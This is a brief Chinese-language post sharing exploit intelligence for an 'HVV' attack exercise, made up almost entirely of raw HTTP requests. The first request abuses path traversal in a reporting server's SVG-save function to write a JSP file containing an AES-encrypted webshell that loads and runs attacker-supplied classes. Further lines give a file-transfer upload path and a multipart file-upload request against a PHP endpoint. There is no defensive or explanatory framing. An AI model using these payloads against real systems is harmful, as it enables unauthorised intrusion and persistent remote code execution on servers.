HVV情报第一发

POST  /WebReport/ReportServer?  op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update  .jsp  HTTP/1.1Host:  xx:8080User-Agent:  Mozilla/5.0  (Windows  aConnection:  closeAccept-Au:  xContent-Type:  text/xml;charset=UTF-8Content-Length:  675  {"__CONTENT__":"<%@page  import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class  U  extends  ClassLoader{U(ClassLoader  c){super(c);}public  Class  g(byte  []b){return  super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null)  {String  k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher  c=Cipher.getInstance("AES");c.init(2,new  SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new  U(this.getClass().getClassLoader()).g(c.doFinal(new  sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta  nce().equals(pageContext);%>","__CHARSET__":"UTF-8"}

multipartRequest 上传即可

/page/exportImport/fileTransfer/xxx.jsp

POST /Upload/upload_file.php?l=1 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Referer: x.x.x.xAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,fil;q=0.8Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGvContent-Length: 164------WebKitFormBoundaryfcKRltGvContent-Disposition: form-data; name="file"; filename="1.png"Content-Type: image/avif1------WebKitFormBoundaryfcKRltGv--